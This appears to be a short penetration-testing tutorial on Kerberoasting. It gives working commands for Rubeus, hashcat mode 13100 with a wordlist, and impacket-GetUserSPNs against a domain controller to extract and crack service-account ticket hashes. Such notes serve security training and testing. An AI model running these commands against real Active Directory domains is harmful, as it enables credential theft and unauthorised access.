Kerberoasting

Kerberoasting is the method of obtaining the TGS for a service and then cracking the ticket to guess the password of the service account. For e.g. in order to access an IIS service hosted within a domain, we can get the TGS from the AD and then guess the password of the IIS service account.

We will do that using Rubeus,

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

The output of this command will be a hash file that can be cracked using hashcat using the following command,

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also perform the same exercise from Linux using Impacket. We will need the domain and the username that is active within the domain. The following command can be used,

sudo impacket-GetUserSPNs -request -dc-ip 192.168.1.56 p42.com/john

The output can once again be cracked using hashcat.

Last updated